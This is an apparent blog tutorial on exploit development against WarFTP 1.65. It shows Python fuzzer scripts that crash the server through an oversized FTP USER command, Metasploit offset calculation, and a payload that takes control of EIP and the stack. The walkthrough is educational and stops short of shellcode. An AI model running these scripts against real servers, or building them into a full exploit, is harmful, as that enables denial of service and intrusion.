What is buffer overflow? Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety. Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security.
Now, we will try to attacking vulnerability of WarFTP 1.65 using buffer overflow. Is there anyone asking why we use WarFTP? Because the WarFTP didn't have a protection from buffer overflow attack.
The tools that we need to do vulnerability testing with buffer overflow is:
1. Ollydog, as a debugger.
2. Fuzzer for fuzzing process.
3. Python, for making fuzzer application and exploit.
4. Windows XP
5. Backtrack OS
Okey, run your WarFTP on Windows XP. If you didn't have WarFTP installed in your Windows XP, you can download the WarFTP file at the end of this article.
If the WarFTP is already running in Windows XP, now we will make the fuzzer that can sending a data to the FTP protocol. Fuzzer made from Python language.
#!/usr/bin/pythonlook at row 4, from the above code, it means to create a variable named buffer which contains 1000 characters "A". And below, in the 5th row, is the command to connect to an IP on port 21. At the 8th row, it sends a command to the standard of the FTP protocol, which sends user and password.
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*1000
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")
Okey, now try to running WarFTP program, and start service of WarFTP by clicking the thunder icon, or go to Properties -> Start Service.
And then try to connect ftp with nc from Backtrack. Use command below.
root@bt:~# nc 192.168.56.101 21If the configuration running well dan the WarFTP server already running, then will apear window like below.
Next step we will try to running fuzzer application that we have made. Use command below.
root@bt:~# python xfuzz.pyIf the step is correct, then the application WarFTP will disappear from the screen. It happens because the application crashes when processing data sent by fuzzer.
And then, we will try to know what really happen to WarFTP server so it could be a crash. In the next step we will use debugger to run WarFTP to know all data process.
To perform debugging, we will use Ollydbg application. Run WarFTP server with Ollydbg. If an error message appears, then you must delete file FtpDaemon.DAT, run the WarFTP server again and create a dummies user.
Try to run again the WarFTP from Ollydbg, then re run the fuzzer application from Backtrack, what happens? After we run WarFTP server from Ollydog we know what happened with register system when crash happen. Seen four registers in the application data transmitted WarFTP crushed using a fuzzer, namely ESP, EDI, EBP and EIP.
In the next step we will try to know the number of byte where the EIP registers stacked using Metasploit framework exploit. One of Metasploit tool that commonly used for development vulnerability is a pattern_create. Pattern_create used to know the true locations of the strings in the data packets transmitted by the fuzzer into the application. Run the pattern_create.rb, first located to the folder /pentest/exploits/framework/tools/.
root@bt:/pentest/exploits/framework2/tools#then run this command if we are already in the folder.
./pattern_create.rb 1000 > string_pattern.txtThe pattern_create will create string_pattern.txt that the contents of the character data of 1000 bytes. Then copy the code from string_pattern.txt, and insert to fuzzer application, to change the buffer string. Then try to fuzzing the WarFTP application again, and see what happen.
Different from before, now the memory of WarFTP server fully charged with a string pattern entered in the application fuzzer.
Then we will calculate of byte from pattern that made from pattern_create.rb with pattern_offset. This application has same folder with pattern_create. To running this application just insert the value in the ESP and EIP. The pattern_offset will calculate how many bytes of data from the initial pattern to the string contained in the register.
./pattern_offset.rb 32714131The result for EIP is 485.
./pattern_offset.rb q4Aq5AqThe result for ESP is 493
From the result we know that the EIP register will overwritten 4 times, in bytes 486, 487, 488, and 489. To prove it, we will customized the fuzzer application by changing the value of the variable buffer. The script fuzzing code has changed like below. The value in EIP has changed to DEADBEAF.
#!/usr/bin/pythonRun again WarFTP from Ollydbg, and run the fuzzer application too. See the result.
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90"*485
buffer += "\xEF\xBE\xAD\xDE"
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")
The value of EIP has change in the register log to the DEADBEEF. Then we try to write on the ESP. Once again, customized the fuzzer application script.
#!/usr/bin/python
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90"*485
buffer += "\xEF\xBE\xAD\xDE"
buffer += "\x90"*(493-len(buffer))
buffer += "\xCC"*(1000-len(buffer))
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")
0 comments:
Post a Comment
Comment in here...